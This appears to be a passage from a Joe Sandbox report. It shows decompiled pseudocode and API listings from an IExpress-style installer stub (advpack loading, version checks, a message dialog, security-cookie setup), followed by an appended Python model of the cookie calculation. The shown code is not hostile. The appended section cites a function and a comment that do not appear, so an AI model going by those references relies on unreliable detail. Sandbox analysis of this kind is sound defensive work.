• MessageBoxA.USER32(00000000,00000000,nst0dum,00000030), ref: 00FD39F1
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Message$BeepVersion
• String ID: 3$nst0dum
• API String ID: 2519184315-140149190
• Opcode ID: e860a7d59e056a26eeccc76ff90f1a8b89671db5a0febd97f56a09fddbed77ae
• Instruction ID: c7fe69a0aff116851882d5a00cf17cddd8532a213448e99f91fbf291429e5181
• Opcode Fuzzy Hash: e860a7d59e056a26eeccc76ff90f1a8b89671db5a0febd97f56a09fddbed77ae
• Instruction Fuzzy Hash: B091D172F062249BDB658B24CC90BAA77B3AB45310F1D00ABDA49A7351D7758E81FB43
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 83%
E00FD6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
	signed int _v8;
	char _v268;
	void* __edi;
	signed int _t9;
	signed char _t14;
	struct HINSTANCE__* _t15;
	void* _t18;
	CHAR* _t26;
	void* _t27;
	signed int _t28;

	_t27 = __esi;
	_t18 = __ebx;
	_t9 =  *0xfd8004; // 0x42de454f
	_v8 = _t9 ^ _t28;
	_push(__ecx);
	E00FD1781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
	_t26 = "advpack.dll";
	E00FD658A( &_v268, 0x104, _t26);
	_t14 = GetFileAttributesA( &_v268);
	if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
		_t15 = LoadLibraryA(_t26);
	} else {
		_t15 = LoadLibraryExA( &_v268, 0, 8);
	}
	return E00FD6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
}

APIs
• GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00FD64DF
• LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00FD64F9
• LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00FD6502
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: LibraryLoad$AttributesFile
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
• API String ID: 438848745-3856989675
• Opcode ID: e09550039c8d93b15d4855112899f6a5f301f17d19ef5106220d6840d107fae6
• Instruction ID: e886e4802ac3008eb336e0ad1201ba9c4e45b43d7f086904da410250c8263f2d
• Opcode Fuzzy Hash: e09550039c8d93b15d4855112899f6a5f301f17d19ef5106220d6840d107fae6
• Instruction Fuzzy Hash: 2A012130A00108ABDB10DB70EC49FEA733AEB50310F480197F485D22C0DFB09ECABA11
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00FD28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
	void* _v8;
	char* _v12;
	intOrPtr _v16;
	void* _v20;
	intOrPtr _v24;
	int _v28;
	int _v32;
	void* _v36;
	int _v40;
	void* _v44;
                                                                                                                                                                                                    				intOrPtr _v48;
                                                                                                                                                                                                    				intOrPtr _v52;
                                                                                                                                                                                                    				intOrPtr _v56;
                                                                                                                                                                                                    				intOrPtr _v60;
                                                                                                                                                                                                    				intOrPtr _v64;
                                                                                                                                                                                                    				long _t68;
                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                    				void* _t73;
                                                                                                                                                                                                    				void* _t79;
                                                                                                                                                                                                    				void* _t83;
                                                                                                                                                                                                    				void* _t87;
                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                    				intOrPtr _t93;
                                                                                                                                                                                                    				intOrPtr _t97;
                                                                                                                                                                                                    				intOrPtr _t99;
                                                                                                                                                                                                    				int _t101;
                                                                                                                                                                                                    				void* _t103;
                                                                                                                                                                                                    				void* _t106;
                                                                                                                                                                                                    				void* _t109;
                                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_v12 = __edx;
                                                                                                                                                                                                    				_t99 = __ecx;
                                                                                                                                                                                                    				_t106 = 0;
                                                                                                                                                                                                    				_v16 = __ecx;
                                                                                                                                                                                                    				_t87 = 0;
                                                                                                                                                                                                    				_t103 = 0;
                                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                                    				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                    					L19:
                                                                                                                                                                                                    					_t106 = 1;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t62 = 0;
                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                    						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                    						if(E00FD2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                    						_v28 = _t68;
                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                    							_t99 = _v16;
                                                                                                                                                                                                    							_t70 = _v8 + _t99;
                                                                                                                                                                                                    							_t93 = _v24;
                                                                                                                                                                                                    							_t87 = _v20;
                                                                                                                                                                                                    							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                    							if(_t103 != 0) {
                                                                                                                                                                                                    								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                    								_v36 = _t73;
                                                                                                                                                                                                    								if(_t73 != 0) {
                                                                                                                                                                                                    									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                    										L15:
                                                                                                                                                                                                    										GlobalUnlock(_t103);
                                                                                                                                                                                                    										_t99 = _v16;
                                                                                                                                                                                                    										L18:
                                                                                                                                                                                                    										_t87 = _t87 + 1;
                                                                                                                                                                                                    										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                    										_v20 = _t87;
                                                                                                                                                                                                    										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                    										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                    											continue;
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L19;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										_t79 = _v44;
                                                                                                                                                                                                    										_t88 = _t106;
                                                                                                                                                                                                    										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                    										_t101 = _v28;
                                                                                                                                                                                                    										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                    										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                    										_t97 = _v48;
                                                                                                                                                                                                    										_v36 = _t83;
                                                                                                                                                                                                    										_t109 = _t83;
                                                                                                                                                                                                    										do {
                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00FD2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                    											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00FD2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                    											_t109 = _t109 + 0x18;
                                                                                                                                                                                                    											_t88 = _t88 + 4;
                                                                                                                                                                                                    										} while (_t88 < 8);
                                                                                                                                                                                                    										_t87 = _v20;
                                                                                                                                                                                                    										_t106 = 0;
                                                                                                                                                                                                    										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                    											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                    												GlobalUnlock(_t103);
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												goto L15;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											goto L15;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L20;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				L20:
                                                                                                                                                                                                    				 *_a8 = _t87;
                                                                                                                                                                                                    				if(_t103 != 0) {
                                                                                                                                                                                                    					GlobalFree(_t103);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t106;
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x00fd2a27
                                                                                                                                                                                                    0x00fd2a4c
                                                                                                                                                                                                    0x00fd2a4f
                                                                                                                                                                                                    0x00fd2a50
                                                                                                                                                                                                    0x00fd2a53
                                                                                                                                                                                                    0x00fd2a56
                                                                                                                                                                                                    0x00fd2a5c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd29b2
                                                                                                                                                                                                    0x00fd29b2
                                                                                                                                                                                                    0x00fd29b5
                                                                                                                                                                                                    0x00fd29bd
                                                                                                                                                                                                    0x00fd29c3
                                                                                                                                                                                                    0x00fd29cc
                                                                                                                                                                                                    0x00fd29d5
                                                                                                                                                                                                    0x00fd29d7
                                                                                                                                                                                                    0x00fd29da
                                                                                                                                                                                                    0x00fd29dd
                                                                                                                                                                                                    0x00fd29df
                                                                                                                                                                                                    0x00fd29ec
                                                                                                                                                                                                    0x00fd29f8
                                                                                                                                                                                                    0x00fd29fc
                                                                                                                                                                                                    0x00fd29ff
                                                                                                                                                                                                    0x00fd2a02
                                                                                                                                                                                                    0x00fd2a07
                                                                                                                                                                                                    0x00fd2a0a
                                                                                                                                                                                                    0x00fd2a0f
                                                                                                                                                                                                    0x00fd2a19
                                                                                                                                                                                                    0x00fd2a81
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2a0f
                                                                                                                                                                                                    0x00fd298c
                                                                                                                                                                                                    0x00fd2974
                                                                                                                                                                                                    0x00fd2962
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd294f
                                                                                                                                                                                                    0x00fd2912
                                                                                                                                                                                                    0x00fd2a65
                                                                                                                                                                                                    0x00fd2a68
                                                                                                                                                                                                    0x00fd2a6c
                                                                                                                                                                                                    0x00fd2a6f
                                                                                                                                                                                                    0x00fd2a6f
                                                                                                                                                                                                    0x00fd2a7d

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GlobalFree.KERNEL32 ref: 00FD2A6F
                                                                                                                                                                                                      • Part of subcall function 00FD2773: CharUpperA.USER32(42DE454F,00000000,00000000,00000000), ref: 00FD27A8
                                                                                                                                                                                                      • Part of subcall function 00FD2773: CharNextA.USER32(0000054D), ref: 00FD27B5
                                                                                                                                                                                                      • Part of subcall function 00FD2773: CharNextA.USER32(00000000), ref: 00FD27BC
                                                                                                                                                                                                      • Part of subcall function 00FD2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD2829
                                                                                                                                                                                                      • Part of subcall function 00FD2773: RegQueryValueExA.ADVAPI32(?,00FD1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD2852
                                                                                                                                                                                                      • Part of subcall function 00FD2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD2870
                                                                                                                                                                                                      • Part of subcall function 00FD2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00FD28A0
                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00FD3938,?,?,?,?,-00000005), ref: 00FD2958
                                                                                                                                                                                                    • GlobalLock.KERNEL32 ref: 00FD2969
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00FD3938,?,?,?,?,-00000005,?), ref: 00FD2A21
                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00FD2A81
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3949799724-0
                                                                                                                                                                                                    • Opcode ID: 624214039f022e9c9a5b889981bfae53d27d15af55aa8533f75542774202d6df
                                                                                                                                                                                                    • Instruction ID: 149fe2a4584d7ba5c338575a9292e29baaca620511cd69e7d21724151e44b8fd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 624214039f022e9c9a5b889981bfae53d27d15af55aa8533f75542774202d6df
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11512A31D00219DBCB61DFA8C884AAEFBB6FF58711F18406BE905E3311DB359941EB95
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                    			E00FD4169(void* __eflags) {
                                                                                                                                                                                                    				int _t18;
                                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t20 = E00FD468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                    				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                                                                                    					if(E00FD468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                    						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							return LocalFree(_t21);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(0x40);
                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                    						_push(_t21);
                                                                                                                                                                                                    						_t18 = 0x3e9;
                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                    						E00FD44B9(0, _t18);
                                                                                                                                                                                                    						goto L7;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0x10);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                    					_t18 = 0x4b1;
                                                                                                                                                                                                    					goto L6;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return E00FD44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                    			}

APIs
  • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
  • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
  • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
  • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
  • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
  • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
  • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
• LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00FD30B4), ref: 00FD4189
• LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00FD30B4), ref: 00FD41E7
  • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
  • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
• String ID: <None>$FINISHMSG
• API String ID: 3507850446-3091758298
• Opcode ID: 974b84cb832ac8e543c941529093c5e56e75f41cd20d17407a87938402b4777c
• Instruction ID: 39fcb3fb7cede4fd6325b311bddf85128023692f6be370311248ed6bb46c38ec
• Opcode Fuzzy Hash: 974b84cb832ac8e543c941529093c5e56e75f41cd20d17407a87938402b4777c
• Instruction Fuzzy Hash: CC01ADA27002183BE3261A758C86F7B628FEB95795F184027B706E27809A79EC417179
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 93%
E00FD19E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
	signed int _v8;
	char _v520;
	void* __esi;
	signed int _t11;
	void* _t14;
	intOrPtr _t15;
	void* _t23;
	void* _t27;
	intOrPtr _t32;
	void* _t33;
	struct HWND__* _t34;
	signed int _t35;

	_t33 = __edi;
	_t27 = __ebx;
	_t11 =  *0xfd8004; // 0x42de454f, the /GS security cookie
	_v8 = _t11 ^ _t35; // cookie XOR frame pointer, verified on return
	_t34 = _a4; // dialog window handle
	_t14 = _a8 - 0x110; // message ID relative to WM_INITDIALOG (0x110)
	if(_t14 == 0) {
		// WM_INITDIALOG: pass the desktop window to E00FD43D0, load string resource _a16
		// into a 0x200-byte buffer, show it in control 0x83f and beep
		_t32 = GetDesktopWindow();
		E00FD43D0(_t34, _t15);
		_v520 = 0;
		LoadStringA( *0xfd9a3c, _a16,  &_v520, 0x200);
		SetDlgItemTextA(_t34, 0x83f,  &_v520);
		MessageBeep(0xffffffff);
		goto L6;
	} else {
		if(_t14 != 1) {
			// any message other than WM_INITDIALOG or WM_COMMAND is left unhandled (returns 0)
			L4:
			_t23 = 0;
		} else {
			// WM_COMMAND (0x111): only control IDs 0x83d and 0x83e close the dialog
			_t32 = _a12;
			if(_t32 - 0x83d > 1) {
				goto L4;
			} else {
				EndDialog(_t34, _t32);
				L6:
				_t23 = 1;
			}
		}
	}
	return E00FD6CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34); // security-cookie check, then return _t23
}

APIs
• EndDialog.USER32(?,?), ref: 00FD1A18
• GetDesktopWindow.USER32 ref: 00FD1A24
• LoadStringA.USER32(?,?,00000200), ref: 00FD1A4F
• SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00FD1A62
• MessageBeep.USER32(000000FF), ref: 00FD1A6A
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
• String ID:
• API String ID: 1273765764-0
• Opcode ID: 5eef977b97c7d600545a36069b425b8535cd458e02fba0d62a5d9492d4293295
• Instruction ID: fbb11a4915c7318206bf461ef95514d8994d81e75160800029fcff9291775582
• Opcode Fuzzy Hash: 5eef977b97c7d600545a36069b425b8535cd458e02fba0d62a5d9492d4293295
• Instruction Fuzzy Hash: 9E118E3150211DABDB10EFB8DD08BAE77BAFB49310F148156F92293291DA349E05FB95
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E00FD7155() {
	void* _v8;
	struct _FILETIME _v16;
	signed int _v20;
	union _LARGE_INTEGER _v24;
	signed int _t23;
	signed int _t36;
	signed int _t37;
	signed int _t39;

	_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
	_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                    				_t23 =  *0xfd8004; // 0x42de454f
                                                                                                                                                                                                    				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                    					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                    					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                    					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                    					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                    					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                    					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                    					_t39 = _t36;
                                                                                                                                                                                                    					if(_t36 == 0xbb40e64e || ( *0xfd8004 & 0xffff0000) == 0) {
                                                                                                                                                                                                    						_t36 = 0xbb40e64f;
                                                                                                                                                                                                    						_t39 = 0xbb40e64f;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0xfd8004 = _t39;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t37 =  !_t36;
                                                                                                                                                                                                    				 *0xfd8008 = _t37;
                                                                                                                                                                                                    				return _t37;
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00fd715d
                                                                                                                                                                                                    0x00fd7161
                                                                                                                                                                                                    0x00fd7165
                                                                                                                                                                                                    0x00fd7178
                                                                                                                                                                                                    0x00fd7182
                                                                                                                                                                                                    0x00fd718e
                                                                                                                                                                                                    0x00fd7197
                                                                                                                                                                                                    0x00fd71a0
                                                                                                                                                                                                    0x00fd71b1
                                                                                                                                                                                                    0x00fd71b8
                                                                                                                                                                                                    0x00fd71c4
                                                                                                                                                                                                    0x00fd71c7
                                                                                                                                                                                                    0x00fd71cb
                                                                                                                                                                                                    0x00fd71d5
                                                                                                                                                                                                    0x00fd71da
                                                                                                                                                                                                    0x00fd71da
                                                                                                                                                                                                    0x00fd71dc
                                                                                                                                                                                                    0x00fd71dc
                                                                                                                                                                                                    0x00fd71e2
                                                                                                                                                                                                    0x00fd71e5
                                                                                                                                                                                                    0x00fd71ee

APIs
• GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00FD7182
• GetCurrentProcessId.KERNEL32 ref: 00FD7191
• GetCurrentThreadId.KERNEL32 ref: 00FD719A
• GetTickCount.KERNEL32 ref: 00FD71A3
• QueryPerformanceCounter.KERNEL32(?), ref: 00FD71B8
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: f09d267ed96fbfbceedde32e553831f170b2fa0be1ef3e57478aa9cf85cfc413
• Instruction ID: ab6f5c8837430318a6ad7125fb8d619918b4935968022906fc758f7b8b8d3064
• Opcode Fuzzy Hash: f09d267ed96fbfbceedde32e553831f170b2fa0be1ef3e57478aa9cf85cfc413
• Instruction Fuzzy Hash: F8113A71D0620CDBCB10DFB8DA48A9EB7F6EF08310F654957D801E7214EA309A05AF45
Uniqueness

Uniqueness Score: -1.00%
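The cookie derivation in E00FD7155 above, carried through as an added example. This is the editor's code, not code from the sample or from the report: a pure-Python model of the XOR mix with the entropy sources passed in as parameters, so the two rejection conditions can be exercised with chosen inputs, plus the per-frame cookie arithmetic that the /GS prologue of E00FD63C0 (`_v8 = *0xfd8004 ^ _t40`) and its epilogue check rely on. The constants are the standard MSVC values; all input values are constructed, and the function names are mine.

```python
MASK32 = 0xFFFFFFFF
DEFAULT_COOKIE = 0xBB40E64E   # MSVC default __security_cookie, as tested at 0x00fd7178
FALLBACK_COOKIE = 0xBB40E64F  # value the listing stores when the derived cookie is rejected


def derive_cookie(filetime_low, filetime_high, pid, tid, tick, qpc_low, qpc_high, frame_addr):
    """Model of the mix performed by E00FD7155 (MSVC __security_init_cookie).

    Every argument is a 32-bit value the real code obtains from the OS or the stack:
    the two FILETIME halves, process and thread id, GetTickCount, the two halves of the
    QueryPerformanceCounter result and the address of the local _v8 (stack randomisation).
    Returns (cookie, complement) as the code stores them at 0xfd8004 / 0xfd8008.
    """
    v = (filetime_high ^ filetime_low) & MASK32
    v ^= pid
    v ^= tid
    v = (tick ^ v ^ frame_addr) & MASK32
    v = (qpc_high ^ qpc_low ^ v) & MASK32
    # Rejection rule: the default value would make the cookie predictable, and a zero
    # high word could be reproduced by the terminator of a string copy; the listing
    # substitutes default+1 in both cases (modelled on the derived value, see the
    # comment at 0x00fd71cb for what the listing actually reads).
    if v == DEFAULT_COOKIE or (v & 0xFFFF0000) == 0:
        v = FALLBACK_COOKIE
    return v, (~v) & MASK32


def frame_cookie(cookie, ebp):
    """Per-frame value a /GS prologue stores at [ebp-4]: global cookie XOR frame pointer."""
    return (cookie ^ ebp) & MASK32


def frame_cookie_ok(stored, cookie, ebp):
    """Epilogue check: XOR the frame pointer back in and compare with the global cookie."""
    return ((stored ^ ebp) & MASK32) == cookie


if __name__ == "__main__":
    # Constructed inputs (not values observed in the report)
    cookie, comp = derive_cookie(0x1A2B3C4D, 0x000001D9, 0x1F40, 0x00C8,
                                 0x00ABCDEF, 0x12345678, 0x00000003, 0x0019FF2C)
    print(f"cookie={cookie:#010x} complement={comp:#010x}")
    print("default rejected ->", hex(derive_cookie(0, 0, 0, 0, 0, 0, 0, DEFAULT_COOKIE)[0]))
    print("zero high word rejected ->", hex(derive_cookie(0, 0, 0, 0, 0, 0, 0, 0x1234)[0]))
    stored = frame_cookie(0x42DE454F, 0x0019FF2C)   # 0x42de454f is the cookie seen in the dump
    print("frame check:", frame_cookie_ok(stored, 0x42DE454F, 0x0019FF2C),
          "after a one-byte overwrite:", frame_cookie_ok(stored ^ 0x41, 0x42DE454F, 0x0019FF2C))
```

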